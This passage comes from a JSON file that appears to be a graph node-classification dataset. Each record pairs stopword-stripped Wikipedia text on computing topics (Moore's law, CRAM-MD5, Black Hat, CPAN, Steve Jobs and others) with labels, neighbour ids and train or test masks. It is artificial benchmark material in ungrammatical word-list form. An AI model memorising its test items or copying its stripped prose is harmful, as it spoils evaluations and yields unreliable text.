lead harmful environmental impacts hand obsolescence may sometimes desirable company profit immensely regular purchase often expensive new equipment instead retaining one device longer period time industry well aware may utilize planned obsolescence method increasing profits moore law affected performance technologies significantly michael s. malone wrote moore war following apparent success shock awe early days iraq war progress development guided weapons depends electronic technology improvements circuit density low-power operation associated moore law also contributed development technologies including mobile telephones 3-d printing several measures digital technology improving exponential rates related moore law including size cost density speed components moore wrote density components component transistor resistor diode capacitor minimum cost transistors per integrated circuit – popular formulation doubling number transistors integrated circuits every two years end 1970s moore law became known limit number transistors complex chips graph top shows trend holds true today density minimum cost per transistor – formulation given moore 1965 paper density transistors achieved density transistors cost per transistor lowest transistors put chip cost make transistor decreases chance chip work due defect increases 1965 moore examined density transistors cost minimized observed transistors made smaller advances photolithography number would increase rate roughly factor two per year dennard scaling – suggests power requirements proportional area voltage current proportional length transistors combined moore law performance per watt would grow roughly rate transistor density doubling every 1–2 years according dennard scaling transistor dimensions scaled 30 0.7x every technology generation thus reducing area 50 reduces delay 30 0.7x therefore increases operating frequency 40 1.4x finally keep electric field constant voltage reduced 30 reducing energy 65 power 1.4x frequency 50 therefore every technology generation transistor density doubles circuit becomes 40 faster power consumption twice number transistors stays exponential processor transistor growth predicted moore always translate exponentially greater practical cpu performance since around 2005–2007 dennard scaling appears broken even though moore law continued several years yielded dividends improved performance primary reason cited breakdown small sizes current leakage poses greater challenges also causes chip heat creates threat thermal runaway therefore increases energy costs breakdown dennard scaling prompted switch among chip manufacturers greater focus multicore processors gains offered switching cores lower gains would achieved dennard scaling continued another departure dennard scaling intel microprocessors adopted non-planar tri-gate finfet 22 nm 2012 faster consumes less power conventional planar transistor quality adjusted price equipment – price information technology computers peripheral equipment adjusted quality inflation declined 16 per year average five decades 1959 2009 rate quality-adjusted microprocessor price improvement likewise varies linear log scale microprocessor price improvement accelerated late 1990s reaching 60 per year halving every nine months versus typical 30 improvement rate halving every two years years earlier later laptop microprocessors particular improved 25–35 per year 2004–2010 slowed 15–25 per year 2010–2013 number transistors per chip explain quality-adjusted microprocessor prices fully moore 1995 paper limit moore law strict linearity transistor count definition 'moore law come refer almost anything related semiconductor industry plotted semi-log paper approximates straight line hesitate review origins restrict definition hard disk drive areal density – similar observation sometimes called kryder law made 2005 hard disk drive areal density several decades rapid progress areal density advancement slowed significantly around 2010 noise related smaller grain size disk media thermal stability writability using available magnetic fields fiber-optic capacity – number bits per second sent optical fiber increases exponentially faster moore law keck law honor donald keck network capacity – according gerry/gerald butters former head lucent optical networking group bell labs another version called butters law photonics formulation deliberately parallels moore law butters law says amount data coming optical fiber doubling every nine months thus cost transmitting bit optical network decreases half every nine months availability wavelength-division multiplexing sometimes called wdm increased capacity could placed single fiber much factor 100 optical networking dense wavelength-division multiplexing dwdm rapidly bringing cost networking progress seems assured result wholesale price data traffic collapsed dot-com bubble nielsen law says bandwidth available users increases 50 annually pixels per dollar – similarly barry hendy kodak australia plotted pixels per dollar basic measure value digital camera demonstrating historical linearity log scale market opportunity predict future trend digital camera price lcd led screens resolution great moore law compensator tgmlc also known wirth law – generally referred software bloat principle successive generations computer software increase size complexity thereby offsetting performance gains predicted moore law 2008 article infoworld randall c. kennedy formerly intel introduces term using successive versions microsoft office year 2000 2007 premise despite gains computational performance time period according moore law office 2007 performed task half speed prototypical year 2007 computer compared office 2000 year 2000 computer library expansion – calculated 1945 fremont rider double capacity every 16 years sufficient space made available advocated replacing bulky decaying printed works miniaturized microform analog photographs could duplicated on-demand library patrons institutions foresee digital technology would follow decades later replace analog microform digital imaging storage transmission media automated potentially lossless digital technologies allowed vast increases rapidity information growth era sometimes called information age carlson curve – term coined economist describe biotechnological equivalent moore law named author rob carlson carlson accurately predicted doubling time dna sequencing technologies measured cost performance would least fast moore law carlson curves illustrate rapid cases hyperexponential decreases cost increases performance variety technologies including dna sequencing dna synthesis range physical computational tools used protein expression determining protein structures eroom law – pharmaceutical drug development observation deliberately written moore law spelled backwards order contrast exponential advancements forms technology transistors time states cost developing new drug roughly doubles every nine years experience curve effects says doubling cumulative production virtually product service accompanied approximate constant percentage reduction unit cost acknowledged first documented qualitative description dates 1885 power curve used describe phenomenon 1936 discussion cost airplanes",
    "neighbors": [
      6656,
      4228,
      9732,
      9863,
      3596,
      1933,
      398,
      5516,
      6798,
      785,
      6801,
      659,
      6926,
      1941,
      153,
      4508,
      9762,
      5798,
      3882,
      5802,
      8107,
      8367,
      9137,
      3508,
      11444,
      2489,
      8890,
      1083,
      5948,
      10557,
      2623,
      9793,
      8514,
      8900,
      10440,
      5321,
      4811,
      78,
      2383,
      10452,
      2773,
      3159,
      2781,
      1117,
      7006,
      7780,
      10734,
      1775,
      1776,
      4208,
      1778,
      3698,
      4465,
      8688,
      2680,
      3323,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2274,
    "label": 4,
    "text": "CRAM-MD5:cram-md5 cryptography cram-md5 challenge-response authentication mechanism cram based hmac-md5 algorithm one mechanisms supported simple authentication security layer sasl often used email software part smtp authentication authentication pop imap users well applications implementing ldap xmpp beep protocols software requires authentication unencrypted connections cram-md5 preferred mechanisms transmit passwords clear codice_1 codice_2 however ca n't prevent derivation password brute-force attack less effective alternative mechanisms avoid passwords use connections encrypted transport layer security tls cram-md5 protocol involves single challenge response cycle initiated server one-way hash fresh random challenge provide three types security cram-md5 defined ietf standards-track document rfc 2195 supersedes rfc 2095 earlier 1997 de facto standards define cram-md5 authentication method email mailbox-management protocols pop imap cram-md5 one authentication methods supported simple authentication security layer sasl defined 2006 rfc 4422 supersedes 1997 standard rfc 2222 internet assigned numbers authority iana maintains registry sasl mechanisms including cram-md5 limited use cram-md5 required on-demand mail relay odmr defined rfc 2645",
    "neighbors": [
      7426,
      10242,
      7556,
      7557,
      7,
      904,
      4242,
      3477,
      2970,
      2080,
      2083,
      9635,
      2087,
      168,
      6064,
      9909,
      4663,
      10167,
      5433,
      6975,
      5568,
      10058,
      6098,
      6750,
      2143,
      8670,
      6888,
      1012,
      8694,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 2275,
    "label": 4,
    "text": "Black_Hat_Briefings:black hat briefings black hat briefings commonly referred black hat computer security conference provides security consulting training briefings hackers corporations government agencies around world black hat brings together variety people interested information security ranging non-technical individuals executives hackers industry leading security professionals conference takes place regularly las vegas barcelona london abu dhabi conference also hosted amsterdam tokyo washington d.c. past black hat founded 1997 jeff moss also founded def con today moss conference chair black hat review board considered premier information security conferences world black hat started single annual conference las vegas nevada held multiple locations around world black hat acquired cmp media subsidiary u.k.-based united business media ubm 2005 black hat typically scheduled prior def con many attendees going conferences black hat perceived security industry corporate security conference whereas def con informal conference composed three major sections black hat briefings black hat trainings black hat arsenal briefings composed tracks covering various topics including reverse engineering identity privacy hacking briefings also contain keynote speeches leading voices information security field including robert lentz chief security officer united states department defense michael lynn amit yoran former director national cyber security division department homeland security general keith b. alexander former director national security agency former commander united states cyber command training offered various computer security vendors individual security professionals conference hosted national security agency information assurance manager course various courses cisco systems offensive security others arsenal portion conference dedicated giving researchers open source community place showcase latest open-source information security tools arsenal primarily consists live tool demonstrations setting attendees able ask questions tools sometimes use arsenal added 2010 toolswatch maintains archive black hat briefings arsenals black hat known antics hacker contingent disclosures brought talks conference attendees known hijack wireless connections hotels hack hotel television billing systems even hack automated teller machine hotel lobby 2009 web sites belonging handful security researchers groups hacked passwords private e-mails im chats sensitive documents exposed vandalized site dan kaminsky days conference black hat usa 2009 usb thumb drive passed around among attendees found infected conficker virus 2008 three men expelled packet sniffing press room local area network past companies attempted ban researchers disclosing vital information products black hat usa 2005 cisco systems tried stop michael lynn speaking vulnerability said could let hackers virtually shut internet however recent years researchers worked vendors resolve issues vendors challenged hackers attack products",
    "neighbors": [
      1540,
      5636,
      10756,
      11,
      9246,
      3109,
      7218,
      5174,
      7739,
      4159,
      9791,
      2634,
      7759,
      8787,
      107,
      6254,
      5744,
      1143,
      3704,
      3707,
      8320,
      10392,
      161,
      5284,
      2734,
      7855,
      688,
      6834,
      7354,
      7887,
      7377,
      7385,
      3290,
      3805,
      8413,
      3298,
      9964,
      5373,
      268,
      8978,
      4883,
      2837,
      7449,
      5404,
      1838,
      5427,
      2879,
      6473,
      8012,
      9548,
      7515,
      4956,
      4445,
      1381,
      8047,
      2416,
      8050,
      7547,
      6537,
      3473,
      928,
      939,
      11695,
      7601,
      1970,
      7605,
      6588,
      7618,
      3525,
      5575,
      2508,
      5586,
      9688,
      4063,
      5107,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2276,
    "label": 4,
    "text": "Incident_response_team:incident response team incident response team emergency response team ert group people prepare respond emergency incident natural disaster interruption business operations incident response teams common public service organizations well organizations team generally composed specific members designated incident occurs although certain circumstances team may ad hoc group willing volunteers incident response team members ideally trained prepared fulfill roles required specific situation example serve incident commander event large-scale public emergency size incident grows resources drawn event command situation may shift several phases small-scale event usually volunteer ad hoc team may respond events large small specific member ad hoc teams may work jointly unified command system individual team members trained various aspects response either medical assistance/first aid hazardous material spills hostage situations information systems attacks disaster relief ideally team already defined protocol set actions perform mitigate negative effects incident incident response teams address two different types incidents first types public covers larger incidents affect community whole natural disasters hurricane tornado earthquake etc terrorism large-scale chemical spills epidemics type organizational would incident happens somewhat smaller scale affects mostly single company organization examples organizational incidents include bomb threats computer incidents theft accidental exposure sensitive data exposure intellectual property trade secrets product contamination predefined roles typically filled individuals formally trained standby times scheduled hours teams organized ranks clearly defined chain command examples include teams formed response ad hoc volunteer groups many groups created notion true first respondents civilians incident due teams generally made individuals jobs unrelated situation respond due proximity personal attachment sight incident examples include",
    "neighbors": [
      3145
    ],
    "mask": "None"
  },
  {
    "node_id": 2277,
    "label": 3,
    "text": "Pascal_(microarchitecture):pascal microarchitecture pascal codename gpu microarchitecture developed nvidia successor maxwell architecture architecture first introduced april 2016 release tesla p100 gp100 april 5 2016 primarily used geforce 10 series starting geforce gtx 1080 gtx 1070 using gp104 gpu released may 17 2016 june 10 2016 respectively pascal manufactured using tsmc 16nm finfet process later samsung 14nm finfet process architecture named 17th century french mathematician physicist blaise pascal march 18 2019 nvidia announced driver due april 2019 would enable directx raytracing pascal-based cards starting gtx 1060 6 gb 16 series cards feature reserved turing-based rtx series point march 2014 nvidia announced successor maxwell would pascal microarchitecture announced may 6 2016 released may 27 year tesla p100 gp100 chip different version pascal architecture compared gtx gpus gp104 chip shader units gp104 maxwell-like design architectural improvements gp100 architecture include following architectural improvements gp104 architecture include following chip partitioned graphics processor clusters gpcs gp104 chips gpc encompasses 5 sms streaming multiprocessor corresponds amd compute unit smp encompasses 128 single-precision alus cuda cores gp104 chips 64 single-precision alus gp100 chips amd calls cu compute unit compared nvidia calls sm streaming multiprocessor cu versions consist 64 shader processors i.e 4 simd vector units 16-lane wide 64 nvidia regularly calling shader processors cuda cores experimented different numbers polymorph engine version 4.0 unit responsible tessellation corresponds functionally amd geometric processor moved shader module tpc allow one polymorph engine feed multiple sms within tpc gp104 chip sm consists 128 single-precision alus cuda cores gp100 64 single-precision alus due different organization chips like number double precision alus theoretical double precision performance gp100 half theoretical one single precision ratio 1/32 gp104 chip theoretical single-precision processing power pascal gpu gflops computed 2 x operations per fma instruction per cuda core per cycle × number cuda cores × core clock speed ghz theoretical double-precision processing power pascal gpu 1/2 single precision performance nvidia gp100 1/32 nvidia gp102 gp104 gp106 gp107 gp108 theoretical half-precision processing power pascal gpu 2× single precision performance gp100 1/64 gp102 gp104 gp106 gp107 gp108 pascal next architecture preliminarily codenamed volta nvidia announced volta gpu would feature high bandwidth memory unified memory complete fp16 support two times fp32 nvlink still known volta part consumer lineup may replaced ampere turing microarchitectures",
    "neighbors": [
      3585,
      3203,
      398,
      9489,
      1309,
      10658,
      7086,
      9774,
      9911,
      11322,
      5949,
      8514,
      7236,
      7111,
      2635,
      2525,
      9057,
      8937,
      11630,
      1776,
      6900,
      2937,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 2278,
    "label": 3,
    "text": "SLUB_(software):slub software slub unqueued slab allocator memory management mechanism intended efficient memory allocation kernel objects displays desirable property eliminating fragmentation caused allocations deallocations technique used retain allocated memory contains data object certain type reuse upon subsequent allocations objects type used linux became default allocator since 2.6.23",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      5390,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      3512,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 2279,
    "label": 2,
    "text": "Windows_Ink:windows ink windows ink software suite windows 10 contains applications features oriented towards pen computing introduced windows 10 anniversary update suite includes sticky notes sketchpad screen sketch applications tablet pc supports pen input windows ink workspace icon taskbar enabled default otherwise enabled manually user windows ink workspace menu contains links top bottom described simple blank canvas quickly easily draw idea doodle create solve problems place user sketch whatever comes mind without launching full blown drawing program sketchbook clip studio paint includes small subset features full-blown drawing programs digital ruler pen options first run loads image unfinished landscape sketches saved images however possible open re-load previously saved sketch user opens windows ink workspace menu screenshot taken screen shown preview snip sketch item menu user taps draw screenshot using controls aforementioned sketchpad feature similar screen write feature samsung galaxy note devices",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 2280,
    "label": 4,
    "text": "Dmailer:dmailer dmailer specialized portable backup synchronization software range mobile devices including usb flash drives memory cards external hard disk drives mp3 players embedded phone memories sim cards flash-based memory cards mobile phones serving consumers original equipment manufacturers oems dmailer designed developed manufactured marketed portable backup synchronization software dmailer software products bundled sandisk western digital verbatim corporation imation lacie lexar manufacturers ’ portable storage products worldwide dmailer licensed patent-pending synchronization engine technology number companies company flagship product dmailer sync available 19 languages sold 130 countries worldwide 50 million copies shipped date dmailer ’ data backup software supports local online backup march 23 2010 dmailer launched free version backup software dmailer backup v3 software application allows users perform live backup online backup storage device well back pc mac platforms locally via usb drive cd mobile device external hard drive software installation needed restore data included 2 gb free storage online dmailer online online storage service backed secure copies remote server access computer dmailer backup v3 restores data original location elsewhere also performs customized backup product customer support dmailer sync product dmailer online service discontinued dmailer technical assets bought gemalto included yuuwaa service established 2001 dmailer ’ head office located marseille france regional american office chicago illinois local presence australia company founded december 2001 brigitte léonardi winner national contest assistance creation innovative technology companies awarded french ministry research anvar dmailer ’ executives represented nine nationalities ten spoken languages international business experience spanning america north south europe asia pacific dmailer privately held software company received venture capital funding two sources december 2007 bnp paribas private equity alto invest 3.7 million funding provided supports company ’ ongoing r program geared towards delivering efficient productive software solutions customers skype corel microsoft apple developer connection paca mobile center usb simposium dmailer offers branded backup synchronization multimedia software see software listings patent-pending synchronization engine found solutions sold global manufacturers usb flash drives memory cards external hard disk drives dmailer first launched email management application 2001 french “ demêler ” means “ sort organize ” precisely goal first software company help people manage emails 2004 company developed synchronization software called “ dmailer sync ” let users synchronize pcs portable usb drive year dmailer made first oem deal sandisk developed product called “ cruzer sync ” basically dmailer sync branded sandisk cruzer drives 2006 dmailer started shipping dmailer sync along western digital hard drives branded wd sync 2007 2008 dmailer sync shipped along lacie lexar drives “ lacie sync ” “ lexar sync ” respectively 2009 dmailer came backup software called “ dmailer backup ” shipped maxell edgetech verbatim lexar portable drives dmailer backup also available free standalone product customers dmailer sync dmailer backup coupled “ dmailer online ” online storage service lets users backup files online secure servers anytime anywhere access 2009 dmailer also launched product called “ mediamove ” media management software lets user preview media files move phone camera mp3 pc mac share friends upload online media-sharing services dmailer ’ products powered “ dmailer engine ” dmailer engines developed result eight years research development three engines available today serving consumers original equipment manufacturers oems dmailer designs develops manufactures markets portable backup synchronization software solutions dmailer products bundled sandisk western digital verbatim corporation imation lacie lexar manufacturers portable storage products worldwide dmailer licenses patent-pending synchronization engine technology number companies dmailer backup dmailer sync dmailer received deloitte ’ technology fast50 france technology fast500 emea awards 2008 2009 respectively",
    "neighbors": [
      6264,
      8897,
      3366
    ],
    "mask": "None"
  },
  {
    "node_id": 2281,
    "label": 2,
    "text": "CPAN:cpan comprehensive perl archive network cpan repository 250,000 software modules accompanying documentation 39,000 distributions written perl programming language 12,000 contributors cpan denote either archive network perl program acts interface network automated software installer somewhat like package manager software cpan free open source software cpan conceived 1993 active online since october 1995 based ctan model began place unify structure scattered perl archives like many programming languages perl mechanisms use external libraries code making one file contain common routines used several programs perl calls modules perl modules typically installed one several directories whose paths placed perl interpreter first compiled unix-like operating systems common paths include /usr/lib/perl5 /usr/local/lib/perl5 several subdirectories perl comes small set core modules perform bootstrapping tasks codice_1 used building installing extension modules others like cgi.pm merely commonly used cpan main purpose help programmers locate modules programs included perl standard distribution structure decentralized authors maintain improve modules forking creating competing modules task purpose common formal bug tracking system third-party bug tracking system cpan designated suggested official method reporting issues modules continuous development modules rare many abandoned authors go years new versions released sometimes maintainer appointed abandoned module release new versions module accept patches community module time permits cpan revision control system although source modules often stored github also complete history cpan modules available gitpan project allowing easily see complete history modules easy maintenance forks cpan also used distribute new versions perl well related projects parrot perl 6 files cpan referred distributions distribution may consist one modules documentation files programs packaged common archiving format gzipped tar archive zip file distributions often contain installation scripts usually called makefile.pl build.pl test scripts run verify contents distribution functioning properly new distributions uploaded perl authors upload server pause see section uploading distributions pause 2003 distributions started include metadata files called meta.yml indicating distribution name version dependencies useful information however distributions contain metadata metadata present distribution pause software usually try analyze code distribution look information necessarily reliable thousands distributions cpan needs structured useful distributions cpan divided 24 broad chapters based purpose internationalization locale archiving compression conversion mail usenet news distributions also browsed author finally natural hierarchy perl module names codice_2 codice_3 sometimes used browse modules cpan cpan module distributions usually names form cgi-application-3.1 used module name replaced dash version number appended name convention many prominent distributions break convention especially contain multiple modules security restrictions prevent distribution ever replaced virtually distribution names include version number distribution infrastructure cpan consists worldwide network 250 mirrors 60 countries full mirror hosts around 20 gigabytes data mirrors update hourly daily bidaily cpan master site sites major ftp servers mirror lots software others simply servers owned companies use perl heavily least two mirrors every continent except antarctica several search engines written help perl programmers sort cpan official includes textual search browsable index modules extracted copies distributions currently cpan may 16 2018 perl foundation announced search.cpan.org would shut june 29 2018 19 years operation due aging codebase maintenance burden users transitioned redirected third-party alternative metacpan cpan testers group volunteers download test distributions uploaded cpan enables authors modules tested many platforms environments would otherwise access thus helping promote portability well degree quality smoke testers send reports collated used variety presentation websites including main reports site statistics dependencies also perl core module named cpan usually differentiated repository using name cpan.pm cpan.pm mainly interactive shell used search download install distributions interactive shell called cpan also provided perl core usual way running cpan.pm short configuration process mirror selection uses tools available user computer automatically download unpack compile test install modules also capable updating recently effort replace cpan.pm something cleaner modern resulted cpanplus cpan++ set modules cpanplus separates back-end work downloading compiling installing modules interactive shell used issue commands also supports several advanced features cryptographic signature checking test result reporting finally cpanplus uninstall distribution cpanplus added perl core version 5.10.0 modules check distribution dependencies set recursively install prerequisites either automatically individual user approval support ftp http work firewalls proxies authors upload new distributions cpan perl authors upload server pause must request pause account registered may use web interface pause.perl.org ftp interface upload files directory delete pause warn administrator user uploads module already exists unless listed co-maintainer specified pause web interface experienced perl programmers often comment half perl power cpan called perl killer app roughly equivalent pecl pear php pypi python package index repository python rubygems ruby cran r npm node.js luarocks lua hackage haskell cpan use arbitrated name spaces testing regime well defined documentation style makes generally superior archive languages major languages java c++ nothing similar cpan though java central maven given importance perl developer community cpan shapes shaped perl culture self-appointed master librarian jarkko hietaniemi often takes part april fools day jokes 1 april 2002 site temporarily named cjan j stood java 2003 codice_4 domain name redirected matt script archive site infamous perl community badly written code distributions cpan distributed jokes codice_5 hierarchy reserved joke modules instance codice_6 adds codice_7 function n't run code given complement codice_8 built-in even outside codice_5 hierarchy modules still written largely amusement one example codice_10 used write perl programs subset latin 2005 group perl developers also interest javascript got together create jsan javascript archive network jsan near-direct port cpan infrastructure use javascript language lifespan cohesive community 2008 chance meeting cpan admin adam kennedy open source developers conference linux kernel developer rusty russell created ccan comprehensive c archive network ccan direct port cpan architecture use c language",
    "neighbors": [
      8204,
      8213,
      9245,
      10276,
      6184,
      5677,
      7728,
      8262,
      3667,
      7764,
      2658,
      7274,
      7293,
      5249,
      5253,
      10900,
      8347,
      4775,
      4777,
      6313,
      6828,
      7341,
      5819,
      190,
      3777,
      7364,
      4294,
      5833,
      5330,
      6361,
      11492,
      741,
      231,
      8941,
      2804,
      3837,
      9487,
      788,
      1813,
      3350,
      5397,
      8476,
      3876,
      8491,
      1837,
      4398,
      7983,
      9014,
      3918,
      11610,
      7518,
      2401,
      1379,
      9063,
      8554,
      8068,
      8582,
      3988,
      3990,
      8598,
      1952,
      8611,
      4033,
      3522,
      8644,
      9671,
      5578,
      5067,
      463,
      4561,
      11221,
      4057,
      2010,
      6119,
      3563,
      493,
      9714,
      3571
    ],
    "mask": "Test"
  },
  {
    "node_id": 2282,
    "label": 2,
    "text": "Steve_Jobs:steve jobs steven paul jobs february 24 1955 – october 5 2011 american business magnate entrepreneur investor chairman chief executive officer ceo co-founder apple inc. chairman majority shareholder pixar member walt disney company board directors following acquisition pixar founder chairman ceo next jobs widely recognized pioneer microcomputer revolution 1970s 1980s along apple co-founder steve wozniak jobs born san francisco california put adoption raised san francisco bay area attended reed college 1972 dropping year traveled india 1974 seeking enlightenment studying zen buddhism declassified fbi report states used marijuana lsd college told reporter taking lsd one two three important things done life jobs wozniak co-founded apple 1976 sell wozniak apple personal computer together duo gained fame wealth year later apple ii one first highly successful mass-produced personal computers jobs saw commercial potential xerox alto 1979 mouse-driven graphical user interface gui led development unsuccessful apple lisa 1983 followed breakthrough macintosh 1984 first mass-produced computer gui macintosh introduced desktop publishing industry 1985 addition apple laserwriter first laser printer feature vector graphics jobs forced apple 1985 long power struggle company board then-ceo john sculley year jobs took apple members found next computer platform development company specialized computers higher-education business markets addition helped develop visual effects industry funded computer graphics division george lucas lucasfilm 1986 new company pixar produced first 3d computer animated film toy story 1995 apple merged next 1997 jobs became ceo former company within months largely responsible helping revive apple verge bankruptcy worked closely designer jony ive develop line products larger cultural ramifications beginning 1997 think different advertising campaign leading imac itunes itunes store apple store ipod iphone app store ipad 2001 original mac os replaced completely new mac os x based next nextstep platform giving os modern unix-based foundation first time jobs diagnosed pancreatic neuroendocrine tumor 2003 died respiratory arrest related tumor age 56 october 5 2011 steven paul jobs born february 24 1955 abdulfattah jandali joanne schieble adopted paul clara jobs nee hagopian biological father abdulfattah john al- jandali arabic عبد الفتاح الجندلي b 1931 grew homs syria born arab muslim household undergraduate american university beirut lebanon student activist spent time jail political activities pursued phd university wisconsin met joanne carole schieble catholic swiss german descent doctoral candidate jandali teaching assistant course schieble taking although age mona simpson jobs biological sister notes maternal grandparents happy daughter dating muslim walter isaacson steve jobs official biographer additionally states schieble father threatened cut joanne completely continued relationship jobs adoptive father paul reinhold jobs coast guard mechanic leaving coast guard paul jobs married clara hagopian 1946 clara daughter armenian immigrants grew san francisco paul jobs repo man repaired cars attempts start family halted clara ectopic pregnancy leading consider adoption 1955 schieble became pregnant jobs 1954 jandali spent summer family homs syria jandali stated much love joanne ... sadly father tyrant forbade marry syria told wanted give baby adoption according jandali schieble deliberately involve process without telling joanne upped left move san francisco baby without anyone knowing including ... want bring shame onto family thought best everyone schieble gave birth jobs february 24 1955 san francisco chose adoptive couple catholic well-educated wealthy couple changed mind however decided adopt girl instead baby boy placed paul clara jobs neither college education schieble refused sign adoption papers took matter court attempt baby placed different family consented releasing baby paul clara promised would attend college steve jobs high school mother clara admitted girlfriend 17-year-old chrisann brennan frightened love steve first six months life ... scared going take away even case steve difficult child time two felt made mistake wanted return chrisann shared mother comment steve stated already aware would later say deeply loved indulged paul clara many years later steve jobs wife laurene also noted felt really blessed two parents jobs would become upset paul clara referred adoptive parents regarded parents 1,000 regard biological parents jobs referred sperm egg bank harsh way sperm bank thing nothing paul clara adopted jobs sister patricia 1957 family moved mountain view california 1961 time paul built workbench garage son order pass along love mechanics jobs meanwhile admired father craftsmanship knew build anything needed cabinet would build built fence gave hammer could work ... n't fixing cars ... eager hang dad time ten jobs deeply involved electronics befriended many engineers lived neighborhood difficulty making friends children age however seen classmates loner jobs difficulty functioning traditional classroom tended resist authority figures frequently misbehaved suspended times clara taught read toddler jobs stated pretty bored school turned little terror ... seen us third grade basically destroyed teacher frequently played pranks others monta loma elementary school mountain view father paul abused child never reprimanded however instead blamed school placing enough challenge brilliant son jobs would later credit fourth grade teacher imogene teddy hill turning around taught advanced fourth grade class took month get hip situation bribed learning would say really want finish workbook 'll give five bucks finish really kindled passion learning things learned year think learned year school wanted skip next two years grade school go straight junior high learn foreign language parents wisely would n't let happen jobs skipped fifth grade transferred sixth grade crittenden middle school mountain view became socially awkward loner jobs often bullied gave parents ultimatum either take crittenden would drop school though jobs family well used savings 1967 buy new home would allow jobs change schools new house three-bedroom home crist drive los altos california better cupertino school district cupertino california embedded environment even heavily populated engineering families mountain view home house declared historic site 2013 first site apple computer owned patty occupied jobs step-mother marilyn 13 1968 jobs given summer job bill hewlett hewlett-packard jobs cold-called ask parts electronics project n't know ended giving parts got job summer working hewlett-packard line assembling frequency counters ... well assembling may strong putting screws n't matter heaven bill fernandez fellow electronics hobbyist jobs grade cupertino junior high first friend 1967 move fernandez later commented reason kids eighth grade n't like jobs thought odd one friends fernandez eventually introduced jobs 18-year-old electronics whiz homestead high alum steve wozniak lived across street fernandez location los altos home meant jobs would able attend nearby homestead high school strong ties silicon valley began first year late 1968 along fernandez neither jobs fernandez whose father lawyer came engineering households thus decided enroll john mccollum electronics 1 mccollum rebellious jobs grown hair long become involved growing counterculture would eventually clash jobs began lose interest class also interest sports would later say n't took jock always loner underwent change mid-1970 got stoned first time discovered shakespeare dylan thomas classic stuff read moby dick went back junior taking creative writing classes jobs also later noted official biographer started listen music whole lot started read outside science technology—shakespeare plato loved king lear ... senior phenomenal ap english class teacher guy looked like ernest hemingway took bunch us snowshoeing yosemite point jobs developed two different circles friends involved electronics engineering interested art literature dual interests particularly reflected jobs senior year best friends wozniak first girlfriend artistic homestead junior chrisann brennan 1971 wozniak began attending university california berkeley jobs would visit times week experience led study nearby stanford university student union jobs also decided rather join electronics club would put light shows friend homestead avant-garde jazz program described homestead classmate kind brain kind hippie ... never fit either group smart enough nerd n't nerdy intellectual hippies wanted get wasted time kind outsider high school everything revolved around group n't carefully defined group n't anybody individual world individuality suspect senior year late 1971 taking freshman english class stanford working homestead underground film project chrisann brennan mid-1972 graduation leaving reed college jobs brennan rented house roommate al summer brennan jobs steve wozniak found advertisement posted de anza college bulletin board job required people dress characters alice wonderland brennan portrayed alice wozniak jobs al portrayed white rabbit mad hatter later year jobs enrolled reed college portland oregon reed expensive school paul clara could ill afford spending much life savings son higher education brennan remained involved jobs reed also met friend reed daniel kottke first time jobs also became friends reed student body president robert friedland brennan senior homestead plans attend college supportive jobs told planned drop reed want spend parents money neither father jobs adoptive parents gone college jobs continued attend auditing classes included course calligraphy taught robert palladino jobs longer official student brennan stopped visiting jobs later asked come live house rented near reed campus refused started seeing women interested someone met art class brennan speculated house jobs attempt make relationship monogamous 2005 commencement speech stanford university jobs stated period slept floor friends dorm rooms returned coke bottles food money got weekly free meals local hare krishna temple speech jobs said never dropped single calligraphy course college mac would never multiple typefaces proportionally spaced fonts mid-1973 jobs moved back san francisco bay area renting apartment brennan states point relationship complicated could n't break connection could n't commit steve could n't either jobs hitchhiked worked around west coast brennan would occasionally join time brennan notes little little steve separated never able fully let go never talked breaking going separate ways n't conversation one person says continued grow apart jobs would still seek visit working health food store live-in babysitter remained involved continuing see people 1973 steve wozniak designed version classic video game pong finishing wozniak gave board jobs took game atari inc. los gatos california atari thought jobs built gave job technician atari cofounder nolan bushnell later described difficult valuable pointing often smartest guy room would let people know early 1974 jobs living brennan describes simple life los gatos cabin working atari saving money impending trip india brennan visited twice cabin states memoir memories cabin consist jobs reading giving copy listening south indian music using japanese meditation pillow brennan believed distant negative toward brennan states memoir met jobs right left india tried give 100 bill earned 